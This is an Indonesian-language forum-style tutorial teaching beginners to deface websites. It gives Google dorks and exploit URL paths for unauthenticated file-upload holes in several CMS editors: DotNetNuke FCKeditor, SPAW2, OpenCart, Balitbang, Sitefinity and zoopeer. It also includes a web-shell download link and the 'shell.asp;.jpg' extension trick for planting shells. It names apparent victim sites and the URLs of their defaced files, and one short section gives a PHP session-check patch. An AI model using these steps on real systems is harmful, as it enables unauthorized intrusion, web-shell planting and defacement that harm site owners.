--- Cara deface website for newbie ---

1. Deface menggunakan ASPX

DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx
pilih salah satu dork nya,,

klo udah ketemu target nya tambahkan ini

"providers/htmleditorproviders/fck/fcklinkgallery.aspx

di sini sya menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target

http://www.pivocom.com/ sebagai contohnya..

sehingga akan menjadi seperti ini :

"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"

setelah nge klik itu, tnggu loading selesai baru kamu harus klik
"(File A file on your site)
dang anti alamat protocol website nya jadi :
"javascript:__doPostBack('ctlURL$cmdUpload','' )" => [ tanpa tanda kutip 2 ]

ntar keluar sendiri tuh, tombol browse ny kya gini..

klo udah upload file yang pgn kamu masukin,,

file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl,
*.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?zqvx2ajbyc4b17j
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt
sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali
[contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, trus ktia buka hasil deface nya . .

kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya
"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan
catatan setelah kita berhasil/ selesai upload ]

nah..abis itu kamu ganti alamat

"http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
menjadi alamat halaman defaced kita menjadi
http://www.pivocom.com/portals/0/pajenk.asp;.css intinya kita harus menambahkan
"portals/0/" pada akhir http://www.pivocom.com/

2.Deface web dengan SPAW Vulnerably:

DORK
inurl:spaw2/dialogs/ atau
inurl:spaw2/uploads/files/
POC
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2
&lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9
jika sudah menemukan targetnya contoh seperti ini :
http://olgabz.com/spaw2/dialogs/

lalu kamu ganti spaw2/dialogs/"

dengan
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2
&lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9

jadinya kya gini http://olgabz.com/spaw2/dialogs/dial...a752d9%208cac9

nanti akan muncul SPAW File Manager,lihat gambar di bawah ini :

Spoilerfor liat gan:
jangan lupa ganti type nya dari image ke File,dan kamu tinggal upload file kamu..
jika sudah trus di apain...??
yaudah selesai emang mau ngapain ??? heheheh
kidding,,

trus kamu lihat file kamu sudah masuk blom seperti gambar di bawah ini:

lalu bagaimana cara melihat hasil deface kita???

cara nya,kamu klick file yg sudah kamu upload,nanti akan ada tulisan download file di
sebelah kanan,,dan kamu klick,,maka hasil file deface kamu akan keluar seperti ini..

ni hasilnya http://olgabz.com/spaw2/uploads/files/pajenk.html

udah dehh selesai deface nya,,gampang kan ???

3.deface dengan metode opencart:

maaf ini khusu bwat newbi yg ingin blajar,,klo udah master mohon bimbingannya ..
seperti biasa nyarinya lewat paman google

dork nya :
SUPORT BY OPENCART
atau
Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting
suport opencart)
klo pengen smuanya,site nya ilangin jadi gini aja Powered By OpenCart

langsung ke caranya,,
jika kamu sudah mendapatkan target nya

contoh target http://www.digitalbazzar.co.uk/shop bisa juga www.digitalbazzar.co.uk/cart,

www.digitalbazzar.co.uk/patch dll

klo udah dapet targetnya tinggal kita inject exploitnya

admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadinya kya gini http://www.digitalbazzar.co.uk/shop/...tors/test.html
klo ketemu yang kya gini http://digitalbazzar.co.uk/shop/ kamu inject di blakang /shop/ nya..

maka akan muncul tampilan seperti ini..

jangan lupa connectornya di ganti jadi PHP.

lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file
uploaded with no errors"

untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat
hasilnya... :P

jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.digitalbazzar.co.uk/

4.Patch Bug CMS Lokomedia:

contoh lihat
DORK=
inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita

pilih salah satu aja ..

path :
/admin/content.php?module=user

PATCH
untuk memperbaiki bugs pada CMS Lokomedia bisa dengan memberikan Patch pada file
/admin/content.php
dengan menambahkan penggalan kode berikut :
session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

Menambahkan penggalan kode yang sama di file /admin/aksi.php

session_start();
if (empty($_SESSION[namauser]) AND empty($_SESSION[passuser])){
echo "Maaf anda tidak berhak menjalankan modul ini";
}
else{
.....Statement
}

menyaring file yang akan di upload kode pada file aksi.php saat mengedit berita dengan
penggalan kode berikut:

if ($tipe_file != "image/jpeg" AND $tipe_file != "image/pjpeg"){

echo "Gagal menyimpan data !!!
Tipe file $nama_file : $tipe_file
Tipe file yang diperbolehkan adalah : JPG/JPEG.
";
echo "Ulangi Lagi";
}
else{
.....statement
}
sumber

buku Jalan Pintas Menjadi Master PHP karangan Lukmanul Hakim.

5.CMS Balitbang 3.42:

Hasilnya ..
http://smpn4pakem.sch.id//userfiles/pajenk.txt

dorknya
Code:
inurl:/html/siswa.php?

inurl:/html/alumni.php?

inurl:/html/guru.php?

Exploit :
Code:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html

http://public_html/dir/editor/filemanager/connectors/test.html

http://public_html/dir/editor/filemanager/browser/default/browser.ht
ml

pilih salah satu aja ...

klo udah milih target masukin exploitnya
contoh :
Code:

http://smpn4pakem.sch.id/editor/filemanager/connectors/uploadtest.ht
ml

lalu pilih connector nya dari ASP --> PHP,,tinggal masukin filenya agan deh...tapi berbentuk
.TXT yah,,,

6.Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : "Sitefinity: Login"

Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

pertama kamu cari dlu target webnya dengan dork nya.,,

jika target sudah ketemu,masukan exploitnya..
contoh target http://www.hoac-bsa.org/sitefinity/
tambahkan exploitnya sehingga menjadi seperti ini
Code:
http://www.hoac-
bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
jika sudah kya tampilan di atas maka sekarang tinggak kita upload shellnya,..contoh :
(namashell.asp;.jpg) atau (namashell.asp;.gif)

jika sudah terupload,maka cara untuk menampilkan shell punya kita dengan mengklik "view
original size"..
maka hasilnya seperti ini http://www.hoac-bsa.org/Images/pajenk.asp;.jpg
cukup simple bukan .. ???
langsung coba dah gan gk perlu pake bengong ..

7.powered by zoopeer
seperti biasa kita mendeface dengan menggunakan dork biar lebih mudah ..
hampir sama kya opencart lah ..

Quote:
dork nya powered by zoopeer

Quote: exploit
fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/
connector.php
 caranya : Buka google lalu tuliskan powered by zoopeer, jika sudah ada target
contoh :

http://seifico.com/

kita masukan exploitnya,yg akan kita injeksi jadi seperti ini :

http://seifico.com/fck/editor/filemanager/browser/default/browser.html?Type=File&Connect
or=connectors/php/connector.php

klo udah berhasil exploitnya,saatnya kita upload file deface an kita,,

udah pada tau kan ..
jika sudah upload filenya ,ganti code ini

fck/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php
/connector.php

menjadi

images/File/namashell.html hasilnya http://seifico.com/images/File/pajenk.html